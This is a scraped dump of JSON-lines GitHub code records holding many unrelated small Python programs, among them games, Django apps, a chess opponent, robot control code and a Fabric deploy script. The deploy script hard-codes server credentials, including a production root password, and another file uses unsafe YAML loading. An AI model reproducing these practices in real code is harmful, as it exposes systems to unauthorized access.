[]\n async for item, _ in source.get_docs(filtering):\n documents.append(item)\n\n assert documents == [\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"500_Copy.py\",\n \"file_path\": \"/500_files/500_Copy.py\",\n \"size\": 512000,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"dummy_file.txt\",\n \"url\": \"https://www.dropbox.com/scl/fi/pqr123/dummy_file.txt?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n ]\n","repo_name":"elastickent/es_sn_cmdb","sub_path":"tests/sources/test_dropbox.py","file_name":"test_dropbox.py","file_ext":"py","file_size_in_byte":28571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16674861932","text":"from django import forms\nfrom nautobot.apps.secrets import SecretsProvider\nfrom nautobot.extras.secrets.exceptions import SecretParametersError, SecretValueNotFoundError\nfrom nautobot.utilities.forms import BootstrapMixin\n\nfrom . import Settings, SecretStr\n\n\nclass EncryptedConfigSecretsProvider(SecretsProvider):\n \"\"\"\n Encrypted Config SecretsProvider\n\n This SecretsProvider is used to retrieve secrets from the Nautobot configuration Settings class.\n \"\"\"\n\n slug = \"encrypted-config\" # type: ignore\n name = \"Encrypted Config\" # type: ignore\n\n class ParametersForm(BootstrapMixin, forms.Form):\n \"\"\"\n User-friendly form for specifying the required parameters of this provider.\n \"\"\"\n config_key = forms.CharField(\n required=True,\n help_text=\"dotted path to the key in the `uoft_nautobot.Settings` class\"\n )\n\n @classmethod\n def get_value_for_secret(cls, secret, obj=None, **kwargs):\n \"\"\"Retrieve the appropriate Settings class variable's value.\"\"\"\n rendered_parameters = secret.rendered_parameters(obj=obj)\n if \"config_key\" not in rendered_parameters:\n raise SecretParametersError(secret, cls, 'The \"config_key\" parameter is mandatory!')\n key_path = rendered_parameters[\"config_key\"].split(\".\")\n s = Settings.from_cache()\n try:\n for key in key_path:\n s = getattr(s, key)\n except KeyError:\n raise SecretValueNotFoundError(\n secret, cls, f'Undefined key \"{rendered_parameters[\"config_key\"]}\"!'\n )\n if isinstance(s, SecretStr):\n s = s.get_secret_value()\n return s\n\n\nsecrets_providers = [EncryptedConfigSecretsProvider]\n","repo_name":"uoft-networking/tools","sub_path":"projects/nautobot/uoft_nautobot/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41035561044","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Author:Pxz\n# @Time :2019/1/18 0018上午 11:44\n\nimport socket\nimport threading\n\n\ndef client_tcp():\n c_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ip = '127.0.0.1'\n port = 8005\n address = (ip, port)\n c_socket.connect(address)\n return c_socket\n\n\ndef run_thread(c_socket):\n thread_name = threading.current_thread().getName()\n msg = 'from client and the name of thread is %s' % thread_name\n t = threading.Thread(target=my_thread, args=(msg, c_socket))\n # t.daemon = True\n t.start()\n\n\ndef my_thread(msg, c_socket):\n c_socket.sendall(bytes(msg, encoding='UTF-8'))\n rec_msg = c_socket.recv(1024)\n print(rec_msg)\n c_socket.close()\n\n\nif __name__ == \"__main__\":\n for i in range(15):\n run_thread(client_tcp())\n","repo_name":"pxz000git/python-se","sub_path":"module/mysocket/tcp/tcp_client_thread.py","file_name":"tcp_client_thread.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72322870867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n author: Noémi Vadász\n last update: 2019.10.09.\n\n\"\"\"\nimport csv\nimport sys\n\nXTSV_FIELDS = {'id': '_',\n 'form': '_',\n 'anas': '_',\n 'lemma': '_',\n 'upos': '_',\n 'xpostag': '_',\n 'feats': '_',\n 'deprel': '_',\n 'head': '_',\n 'corefhead': '_',\n 'coreftype': '_'}\n\n\ndef check_fields(lines):\n\n for line in lines:\n if isinstance(line, dict):\n for key, value in line.items():\n print(key, value)\n\n\ndef read_xtsv(infile):\n\n lines = list()\n\n with open(infile) as inf:\n reader = csv.reader(inf, delimiter='\\t', quoting=csv.QUOTE_NONE)\n header = next(reader)\n for line in reader:\n if len(line) > 1:\n fields = dict()\n for field in header:\n fields[field] = line[header.index(field)]\n fields.pop('lemma')\n lines.append(fields)\n else:\n lines.append('')\n\n return lines\n\n\ndef merge_files(xtsv, coref):\n\n zipped = list()\n i = 0\n\n dummy = {'form': 'DUMMY',}\n\n while i < len(coref) and i < len(xtsv):\n\n if isinstance(coref[i], dict) and isinstance(xtsv[i], dict):\n\n if coref[i]['form'].lower() == xtsv[i]['form'].lower():\n allfields = XTSV_FIELDS.copy()\n for feat, val in coref[i].items():\n if feat in allfields:\n allfields[feat] = val\n allfields['anas'] = xtsv[i]['anas']\n allfields['xpostag'] = xtsv[i]['xpostag']\n zipped.append(allfields)\n elif (coref[i]['form'] in ('DROP', 'KOPULA')) or coref[i]['form'].startswith('ZÉRÓ_'):\n allfields = XTSV_FIELDS.copy()\n for feat, val in coref[i].items():\n if feat in allfields:\n allfields[feat] = val\n zipped.append(allfields)\n xtsv.insert(i, dummy)\n elif (xtsv[i]['form'] in ('DROP', 'KOPULA')) or xtsv[i]['form'].startswith('ZÉRÓ_'):\n coref.insert(i, dummy)\n\n else:\n zipped.append('')\n\n i += 1\n\n return zipped\n\n\ndef print_corpus(zipped):\n\n header = '\\t'.join([key for key, value in XTSV_FIELDS.items()])\n print(header)\n\n for line in zipped:\n if isinstance(line, dict):\n fields = '\\t'.join(line[field] for field in line)\n print(fields)\n else:\n print(line)\n\n\ndef main():\n\n xtsv_file = sys.argv[1]\n coref_file = sys.argv[2]\n\n xtsv_lines = read_xtsv(xtsv_file)\n coref_lines = read_xtsv(coref_file)\n\n zipped = merge_files(xtsv_lines, coref_lines)\n\n print_corpus(zipped)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vadno/korkor_pilot","sub_path":"scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24173844806","text":"import json\n\n\ndef add_stat(yout=0, inst=0, err=0):\n try:\n dict_stat = read_stats()\n except:\n dict_stat = {\n \"yout\": 0,\n \"inst\": 0,\n \"err\": 0\n }\n\n dictionary = {\n \"yout\": yout + int(dict_stat['yout']),\n \"inst\": inst + int(dict_stat['inst']),\n \"err\": err + int(dict_stat['err'])\n }\n\n # Serializing json\n json_object = json.dumps(dictionary, indent=4)\n\n # Writing to sample.json\n with open(\"stats.json\", \"w\") as outfile:\n outfile.write(json_object)\n\n\ndef read_stats():\n # Opening JSON file\n with open('stats.json', 'r') as openfile:\n # Reading from json file\n json_object = json.load(openfile)\n return json_object\n","repo_name":"dagstatus/Downloader_tg","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22799577607","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport os.path\nimport codecs\nimport yaml\n\nfrom django.db import models\n\nimport mytest.settings\n\nDEFAULT_ENCODING = 'utf-8'\n\nclass TESTDynamicModelManager(object):\n\n def _create_field(self, id, title, type, length=0):\n \"\"\"\n Создание поля по его описанию.\n \"\"\"\n if type == 'int':\n return models.IntegerField()\n elif type == 'char':\n if length <= 0:\n length = 255\n return models.CharField(max_length=length)\n elif type == 'date':\n return models.DateField()\n\n def load_models(self, sYAMLFileName=None):\n \"\"\"\n Загрузка моделей из файла.\n \"\"\"\n new_models = {}\n models_data = self.load_model_data(sYAMLFileName)\n if models_data:\n for name, struct in models_data.items():\n field_data = struct.get('fields', None)\n fields = {}\n for fld in field_data:\n fields[fld['id']] = self._create_field(**fld)\n meta_opts = struct.get('meta_opts', None)\n new_model = self._create_model(name, fields, meta_opts)\n new_models[name] = new_model\n return models_data, new_models\n\n def load_model_data(self, sYAMLFileName=None):\n \"\"\"\n Загрузка данных моделей из файла.\n \"\"\"\n model_data = None\n if os.path.exists(sYAMLFileName):\n f=None\n try:\n f = codecs.open(sYAMLFileName,'r', DEFAULT_ENCODING)\n try:\n model_data = yaml.load(f)\n except:\n print('ERROR. load %s YAML file' % sYAMLFileName)\n raise\n\n f.close()\n f = None\n except:\n if f:\n f.close()\n f = None\n raise\n else:\n print('WARNING. Not found file %s' % sYAMLFileName)\n return model_data\n\n def _create_model(self, model_name=None, fields=None,\n meta_opts=None, base_model_class=models.Model):\n \"\"\"\n Метод возвращает динамически созданный класс модели с указанным\n именем, набором полей и мета-опций, унаследованный от указанного класса модели.\n \"\"\"\n class Meta:\n # обязательно указываем, к какому приложению принадлежит модель\n app_label = 'mytest'\n db_table = model_name\n\n # Дополняем метакласс переданными опциями\n if meta_opts is not None:\n for key, value in meta_opts.iteritems():\n setattr(Meta, key, value)\n\n # Словарь атрибутов модели\n attrs = {'__module__': self.__class__.__module__,\n 'Meta': Meta,\n 'objects': models.Manager()}\n\n # Добавляем поля к модели\n if fields:\n attrs.update(fields)\n\n # Создаем класс модели\n model = type(model_name, (base_model_class,), attrs)\n\n return model\n\ntry:\n MODEL_MANAGER = TESTDynamicModelManager()\n SCHEME, MODELS = MODEL_MANAGER.load_models(mytest.settings.MODEL_YAML_FILENAME)\n #print('DEBUG. SCHEME: %s MODELS: %s' % (SCHEME, MODELS))\nexcept:\n print('ERROR. Create dynamic models')\n raise\n\n","repo_name":"XHermitOne/my_smyt_test","sub_path":"mytest/mytest/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1264720886","text":"# Write a Python program to play the game Hangman. The user needs to guess a secret word\n# by guessing its letters.\n\nprint(\"Welcome to the Hangman game!\")\n\nsecret_word = ['D','U','B','L','I','N']\nblanks = '_' * len(secret_word)\nmistakes = 0\nwhile True:\n letter = input(\"Enter an uppercase letter \")\n mistakes += 1\n for i in range(0, len(secret_word)):\n if secret_word[i] == letter:\n new_word = blanks[:i] + secret_word[i] + blanks[i+1:]\n blanks = new_word\n if mistakes == 10:\n print(\"Game Over\")\n break\n if list(blanks) == secret_word:\n print(\"You won Sanja!!!!!!!!!!!!\")\n break\n print(blanks)\n\n","repo_name":"spuliz/Python","sub_path":"lab10/list&nestedloops-Hangman.py","file_name":"list&nestedloops-Hangman.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18992781135","text":"from mainui import Ui_MainWindow\nfrom func import *\nfrom PyQt6.QtWidgets import *\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtGui import * \nimport sys\nimport json\nclass WindowGui(QMainWindow,Ui_MainWindow):\n \n def __init__(self):\n super(WindowGui,self).__init__()\n self.setWindowIcon(QIcon('logo.ico'))\n self.setupUi(self)\n self.qsettings = QSettings(\"config.ini\")\n #涂鸦\n \n self.tuya_check.setChecked(self.str2bool(self.qsettings.value('tuyaCheckState')))\n self.tuya_choice.setCurrentIndex(self.qsettings.value('tuyaChoice',type=int))\n self.tuya_dif.setCurrentIndex(self.qsettings.value('tuyaDif',type=int))\n self.tuya_times.setText(self.qsettings.value('tuyaTimes'))\n #钓鱼\n # print((self.qsettings.value('fishingCheckState')))\n self.fishing_check.setChecked(self.str2bool(self.qsettings.value('fishingCheckState')))\n self.fishing_point.setCurrentIndex(self.qsettings.value('fishingPoint',type=int))\n self.fishing_times.setText(self.qsettings.value('fishingTimes'))\n\n self.data = None\n self.load_data.clicked.connect(self.loadData)\n self.save.clicked.connect(self.saveSettings)\n self.confirm.clicked.connect(self.taskConfirm)\n def str2bool(self, str):\n if str == 'true':\n return True\n else:\n return False\n def saveSettings(self):\n self.qsettings.setValue('tuyaCheckState', self.tuya_check.isChecked())\n self.qsettings.setValue('fishingCheckState', self.tuya_check.isChecked())\n\n self.qsettings.setValue(\"tuyaChoice\",self.tuya_choice.currentIndex())\n self.qsettings.setValue(\"tuyaDif\",self.tuya_dif.currentIndex())\n self.qsettings.setValue(\"tuyaTimes\",self.tuya_times.text())\n\n self.qsettings.setValue(\"fishingPoint\",self.fishing_point.currentIndex())\n self.qsettings.setValue(\"fishingTimes\",self.fishing_times.text())\n\n def taskConfirm(self):\n \n if self.fishing_check.isChecked():\n diaoyu = Fishing(int(self.fishing_times.text()),self.fishing_point.currentIndex(), self.data)\n diaoyu.fishing()\n\n if self.tuya_check.isChecked():\n tuya = Tuya(self.tuya_choice.currentIndex(), self.tuya_dif.currentIndex(), int(self.tuya_times.text()), self.data)\n tuya.stuya()\n\n def loadData(self):\n try:\n with open('data.json', 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n except:\n raise FileExistsError('配置文件不存在')\nif __name__ == '__main__':\n app = QApplication(sys.argv) \n window = WindowGui()\n window.show() \n sys.exit(app.exec()) \n","repo_name":"Lorpaves/CatCity-AutoFishing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"26674686765","text":"from django.shortcuts import render\nfrom apps.blog import models, forms\n\n\n# Create your views here.\ndef post_list(request):\n posts = models.Post.objects.all().order_by('-created_on')\n\n context = {\n 'posts': posts\n\n }\n\n return render(request, 'post_list.html', context)\n\n\ndef post_detail(request, pk):\n post = models.Post.objects.get(pk=pk)\n\n if request.method == 'POST':\n form = forms.CommentForm(request.POST)\n if form.is_valid():\n comment = models.Comment(author=form.cleaned_data['author'], body=form.cleaned_data['body'], post=post)\n comment.save()\n\n comments = models.Comment.objects.filter(post=post)\n form = forms.CommentForm()\n\n context = {'post': post, 'comments': comments, 'form': form}\n return render(request, 'post_detail.html', context)\n\n\ndef category_post_list(request, category):\n posts = models.Post.objects.filter(categories__name__contains=category).order_by('-created_on')\n\n context = {'category': category, 'posts': posts}\n\n return render(request, 'category_post_list.html', context)\n","repo_name":"Marta99/rp-personal-website-pralab1","sub_path":"apps/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71727758545","text":"# Написать метод count_find_num, который принимает на вход список простых множителей (primesL) и целое число,\r\n# предел (limit), после чего попробуйте сгенерировать по порядку все числа.\r\n# Меньшие значения предела, которые имеют все и только простые множители простых чисел primesL.\r\n\r\nfrom functools import reduce as red\r\n\r\n\r\ndef count_find_num(primesL, limit):\r\n if red(lambda a, b: a * b, primesL) > limit:\r\n return []\r\n result = list()\r\n result.append(red(lambda a, b: a * b, primesL))\r\n for i in primesL:\r\n for prim_fac in result:\r\n prim_fac *= i\r\n while prim_fac <= limit and prim_fac not in result:\r\n result.append(prim_fac)\r\n prim_fac *= i\r\n return [len(result), max(result)]\r\n\r\n\r\nif __name__ == '__main__':\r\n primesL = list(map(int, input().split()))\r\n limit = int(input())\r\n print(count_find_num(primesL, limit))\r\n","repo_name":"Maksim198505/Lection-1","sub_path":"zadanie_5.py","file_name":"zadanie_5.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73247266387","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom fabric.api import env, get, local, put, run\nimport os\nfrom time import sleep\nfrom datetime import datetime\nfrom tempfile import mkdtemp\n\nFILES = []\nEXT = ('py', 'json')\nNO_UPLOAD = ('fabfile.py')\nPRESERVE_FILES = (\n 'conf/collector.json',\n)\n\nAPP_NAME = 'snoopy_oo'\nAPP_PACKAGE = '%s-%s.tbz2' % (APP_NAME,\n datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S'))\nAPP_PATH = '/opt/cyclelogic/%s' % (APP_NAME)\n\nall_files = os.walk('./')\nfor path, dirnames, filenames in all_files:\n for filename in filenames:\n if filename in NO_UPLOAD:\n continue\n else:\n file_extension = filename.split('.')[-1]\n if file_extension in EXT:\n if path[2:]:\n FILES.append('%s/%s' % (path[2:], filename))\n else:\n FILES.append('%s' % (filename))\n\ndef staging():\n env.hosts = ['192.168.23.240']\n env.user = 'deployer'\n env.password = 'deployer'\n\ndef production():\n env.hosts = ['192.168.149.39', '192.168.149.18']\n env.user = 'root'\n env.password = 'Password1'\n\ndef restart():\n run('sudo /etc/init.d/snoopy-collector restart')\n\ndef update(is_install=False):\n 'Install the application (?)'\n\n # Copio el proyecto a una carpeta temporal\n tmp_dir = mkdtemp(prefix='%s_' % (APP_NAME))\n local('tar c %s | tar xC %s' % (' '.join(FILES), tmp_dir))\n\n # Copio desde produccion archivos importantes\n if is_install == False:\n for element in PRESERVE_FILES:\n destination = element.replace(element.split('/')[-1], '')\n destination = '%s/%s' % (tmp_dir, destination)\n if not os.path.exists(destination):\n local('mkdir -p %s' % (destination))\n\n get('%s/%s' % (APP_PATH, element), destination)\n\n try:\n local('mv %s/%s.%s %s/%s' % (tmp_dir, element, env.host,\n tmp_dir, element))\n except:\n pass\n\n # Creo paquete del proyecto temporal y subo\n local('cd %s && tar cjf %s *' % (tmp_dir, APP_PACKAGE))\n put('%s/%s' % (tmp_dir, APP_PACKAGE), APP_PACKAGE)\n run('rm -rf %s/*' % (APP_PATH))\n run('tar xjf %s -C %s' % (APP_PACKAGE, APP_PATH))\n\n run('rm %s' % (APP_PACKAGE))\n\n restart()\n\ndef install():\n run('mkdir -p %s' % (APP_PATH))\n\n update(is_install=True)\n","repo_name":"beigna/baserguin","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15188561693","text":"\"\"\"\n@file evaluate.py\n\nChecking how the model is going to perform.\n\"\"\"\n\n# Initialization\n\nimport os\nfrom Supervised import SupervisedChess as SL\nimport argparse\nimport chess\nfrom GameState import Turn, Castle, GameState, Move\nfrom BitBoard import BitBoard, PieceType, BitBoardsFromFenString, FENParseString, S2I, I2S, Occupier, PIECELABELS\n\n\nclass testModel:\n \"\"\"\n Class to test the Model.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param config: Config to use to control how evaluation should work\n \"\"\"\n parser = argparse.ArgumentParser()\n self.chessClassW = SL(savedModel=\"modelBigBig.ptm\")\n self.chessClassB = SL(savedModel=\"modelBig.ptm\")\n\n def reset(self):\n self.board = None\n self.num_halfmoves = 0\n self.winner = None # type: Winner\n self.turn = None\n self.resigned = False\n self.result = None\n self.board = chess.Board()\n self.myState = GameState.getInitialState()\n self.legalMoves = [\n Move('a2', 'a3'),\n Move('a2', 'a4'),\n Move('b2', 'b3'),\n Move('b2', 'b4'),\n Move('c2', 'c3'),\n Move('c2', 'c4'),\n Move('d2', 'd3'),\n Move('d2', 'd4'),\n Move('e2', 'e3'),\n Move('e2', 'e4'),\n Move('f2', 'f3'),\n Move('f2', 'f4'),\n Move('g2', 'g3'),\n Move('g2', 'g4'),\n Move('h2', 'h3'),\n Move('h2', 'h4'),\n Move('b1', 'a3'),\n Move('b1', 'c3'),\n Move('g1', 'f3'),\n Move('g1', 'h3'),\n ]\n\n def legal_move(self):\n \"\"\"\n Function to get all the legal moves.\n \"\"\"\n # Portion of code before the move is made.\n legal_moves = []\n\n for move in self.board.legal_moves:\n move_str = move.uci()\n start_loc = move_str[:2]\n end_loc = move_str[2:]\n\n my_move = Move(start_loc, end_loc)\n legal_moves.append(my_move)\n\n return legal_moves\n\n def log_move(self, move):\n # Portion of code after the move is made.\n final_move = I2S(move.startLoc) + I2S(move.endLoc)\n final_move = chess.Move.from_uci(final_move)\n self.board.push(final_move)\n\n def play_game(self):\n \"\"\"\n Load the model and check if the model performs better and save the result.\n \"\"\"\n self.reset()\n i = 0\n\n while self.winner is None:\n if i % 2 == 0:\n legal_move = self.legal_move()\n move = self.chessClassW.getMovePreference(\n self.myState, legal_move)\n\n self.log_move(move)\n self.myState = move.apply(self.myState)\n\n else:\n\n while(True):\n move = input(\"Enter a move: \")\n if(self.board.is_legal(chess.Move.from_uci(move))):\n break\n else:\n print(\"Invalid Move Try Again\")\n print()\n\n start_loc = move[:2]\n end_loc = move[2:]\n\n my_move = Move(start_loc, end_loc)\n\n self.log_move(my_move)\n self.myState = my_move.apply(self.myState)\n\n self.num_halfmoves += 1\n\n if self.board.result(claim_draw=True) != \"*\":\n if self.winner is None:\n self.result = self.board.result(claim_draw=True)\n if self.result == '1-0':\n self.winner = 1\n elif self.result == '0-1':\n self.winner = -1\n else:\n self.winner = 0.5\n\n print(move)\n print()\n i = i + 1\n\n print(self.result)\n\n # def evaluate_model(self):\n # \"\"\"\n # Given a model, evaluates it by playing a bunch of games against the current model.\n # \"\"\"\n\n\ndef main():\n \"\"\"\n Plays a game against model.\n \"\"\"\n model = testModel()\n model.play_game()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"taylornelms15/cis519chess","sub_path":"opponent.py","file_name":"opponent.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42612113622","text":"#IMPORTS\nimport random\nimport time\nimport json\nimport speech_recognition as sr\nfrom player import Player\nfrom enemy import Enemy\n\n#SHORTHANDS\nrecognizer = sr.Recognizer()\nmicrophone = sr.Microphone()\n\n#each spell has its own json file\n\"\"\"\nFORMAT:\ngame_name -> string\natrribute (aka element) -> string (fire, water, air, earth)\ntier -> int (0-4)\ntype -> string (offense, defense, support)\ndamage -> int (ignored if not offense type)\ndefense_class -> int (1-2, 1 = subtraction, 2 = percentage, nullification is percentage but 100%, ignored if not defense type)\ndefense_value -> int (value to divide or subtract by, ignored if not defense type)\nsupport_class -> int (1-3, 1 = healing, 2 = good effects, 3 = bad effects, ignored if type is not support)\nheal_value -> int (ignored if not support class 1)\neffect -> string (ignored if not good or bad effect support class)\neffect_value -> int (ignored if not support class or not needed)\nbackfire_chance -> int (chance to backfire if not yet mastered)\nmaster_percentage -> int (chance to be mastered upon use)\nmana_consumption -> int (amount of mana consumed)\n\"\"\"\n\n#list of effect\n\"\"\"\nGOOD:\nelemental_equality -> lessens attribute effects\nimmunity -> immune to poison\nstrength -> multiplies damage done\nabestos -> immune to burn\nBAD:\nburn -> does fire damage over time\npoison -> does damage over time\nweakness -> reduces damage done\nelemental_dominance -> maximises attribute effects\n\"\"\"\n\n#GLOBAL VARIABLES\nVALID_SPELLS = [\"small_fireball\", \"water_bullet\", \"cutting_wind\", \"rock_smash\", \"healing_drop\", \"minor_phoenix_heal\", \"nourishing_mud\", \"refreshing_air\"]\nSPELL_DATA = {}\nTHE_PLAYER = Player()\n\n#FUNCTION FOR GETTING A SPOKEN SPELL\ndef getSpokenSpell():\n rawSpeech = \"\"\n\n try:\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n print(\"Ready\")\n audio = recognizer.listen(source)\n\n rawSpeech = recognizer.recognize_google(audio).split(\" \") \n except:\n print(\"Sorry, I couldn't get what you said. Please try again.\")\n return getSpokenSpell()\n\n for word in rawSpeech:\n rawSpeech[rawSpeech.index(word)] = word.lower()\n\n #pronunced grim-muah\n if (\" \".join(rawSpeech) == \"open grimoire\"):\n for spell in THE_PLAYER.getusedSpells():\n print(SPELL_DATA[spell][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spell][\"tier\"]) + \")\")\n time.sleep(5)\n return getSpokenSpell()\n\n spellName = \"_\".join(rawSpeech)\n \n if not (spellName in VALID_SPELLS):\n print(spellName + \" is not a valid spell. Please try again.\")\n return getSpokenSpell()\n elif (THE_PLAYER.isCastableSpell(spellName)):\n return spellName\n else:\n print(\"You have not unlocked \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\" + \" yet. Please try again.\")\n return getSpokenSpell()\n\ndef castSpell(spellName, caster, target = THE_PLAYER):\n if (caster == THE_PLAYER):\n print(\"You cast: \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\")\n THE_PLAYER.processSpell(spellName)\n if (target == None):\n return\n else:\n target.processAttack(spellName, caster)\n else:\n print(\"Opponent cast: \" + SPELL_DATA[spellName][\"game_name\"] + \" (Tier: \" + str(SPELL_DATA[spellName][\"tier\"]) + \")\")\n caster.processSpell(spellName)\n THE_PLAYER.processAttack(spellName, caster)\n\n#LOADING SPELLS\nfor spell in VALID_SPELLS:\n with open(\"spells/\" + spell + \".json\", \"r\") as spellFile:\n data = json.load(spellFile)\n SPELL_DATA[spell] = data\n\n#TUTORIAL\nprint(\"Greetings, young mage.\")\ntime.sleep(1)\nans = raw_input(\"skip tutorial? (y/n)\")\nif (ans != \"y\"):\n print(\"Try casting a spell.\")\n castedSpell = getSpokenSpell()\n castSpell(castedSpell, THE_PLAYER, None)\n THE_PLAYER.statsReset()\n time.sleep(1)\n print(\"Well then, I think I'm done here so I'll be off.\")\n time.sleep(1)\n print(\"Try to tier up as quick as possible to be able to use more spells.\")\n time.sleep(1)\n print(\"Feel free to copy your opponent's spells if you are of a higher or equal tier and share the same attribute.\")\n time.sleep(1)\n print(\"Beware of backfires though, at best you will waste your mana, at worse you will be severely inflicted by your own spell!\")\n time.sleep(1)\n print(\"Don't forget, you can always use \\\"Open Grimoire\\\" (grim-muah) to get a list of spells you've used before\")\n time.sleep(10)\n print(\"Good luck!\")\n\n#GAME\nenemyCount = 0\npoints = 0\nwhile (THE_PLAYER.getHealth() > 0):\n THE_ENEMY = Enemy()\n enemyCount += 1\n while ((THE_PLAYER.getHealth() > 0) & (THE_ENEMY.getHealth() > 0)):\n castedSpell = getSpokenSpell()\n castSpell(castedSpell, THE_PLAYER, THE_ENEMY)\n castedSpell = THE_ENEMY.chooseSpell()\n castSpell(castedSpell, THE_ENEMY, THE_PLAYER)","repo_name":"peaceknight05/spellGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27605327310","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File:tuple_stu.py\n@Author:fovegage\n@Contact:fovegage@gmail.com\n@Created Time:2019/8/20 10:14 \n@Version:1.0\n'''\n\n# 在Python中,注意args会对元组进行自动封装\n# 应该注意的是对于单个数据类型,在进行声明元组类型时,我们应该用 逗号 进行声明\na = 4,\nb = (4,)\nprint(a is b)\n\nx = 4, 5\ny = (4, 5)\nprint(x is y)\n","repo_name":"fovegage/learn-python","sub_path":"CookBook/数据结构和算法/解压/tuple_stu.py","file_name":"tuple_stu.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"26350151651","text":"\ndef convergencia(x,y,xs,ys,k):\n #Calculo de error\n ex=x-xs\n ey=y-ys\n \n #Control proporcional\n ux=-k*ex\n uy=-k*ey\n\n xx=x+ux #X[1]=X(0)+V*t\n yy=y+uy #Y[1]=Y(0)+V*t\n\n return ex,ey,xx,yy\n\ndef convergencia_xyr1_(x,y,xs,ys,k,xr1,yr1):\n #Potencial atractivo\n ex=x-xs\n ey=y-ys\n ax=-k*ex\n ay=-k*ey\n\n #Potencial repulsivo\n b=((x-xr1)*(x-xr1))+((y-yr1)*(y-yr1))\n r=2\n dbdx=-2*(x-xr1)*(1/b)*(1/b)\n dbdy=-2*(y-yr1)*(1/b)*(1/b)\n\n if b<=(r*r):\n GRx=2*((1/b) -(1/(r*r)))*dbdx\n GRy=2*((1/b) -(1/(r*r)))*dbdy\n else:\n GRx=0\n GRy=0\n\n et=0.01\n RX=-et*GRx\n RY=-et*GRy\n\n #Ley Final\n ux=ax+RX\n uy=ay+RY\n\n #Valores siguientes\n xx=x+ux #X[1]=X(0)+V*t\n yy=y+uy #Y[1]=Y(0)+V*t\n\n return ex,ey,xx,yy","repo_name":"HuberGiron/Robot-uniciclo-Ibero-2","sub_path":"5_Python_particula/02_Convergencia_directa_evitar1/control_robot.py","file_name":"control_robot.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41490563853","text":"from flask import Flask\nimport secrets\napp = Flask(__name__)\n\nbenefits = [\n \"Jurassic park is real\",\n \"You can time travel\",\n \"You can fall asleep whenever you want\",\n]\n\ndrawbacks = [\n \"there's a turtle somewhere in the world, moving toward you at all times, and if it touches you you die\",\n \"you can only wear one shirt for the rest of your life\",\n]\n\n@app.route('/')\ndef make_hypothesis():\n benefit = secrets.choice(benefits)\n drawback = secrets.choice(drawbacks)\n\n return \"{} BUT {}.\".format(benefit, drawback)\n\nif __name__ == '__main__':\n print(\"hello world people!\")\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"ekmixon/servantes","sub_path":"hypothesizer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"3974815040","text":"# @author\n# Ashutosh.Verma\n\n# Problem: https://leetcode.com/problems/add-to-array-form-of-integer/\n\nclass Solution(object):\n def 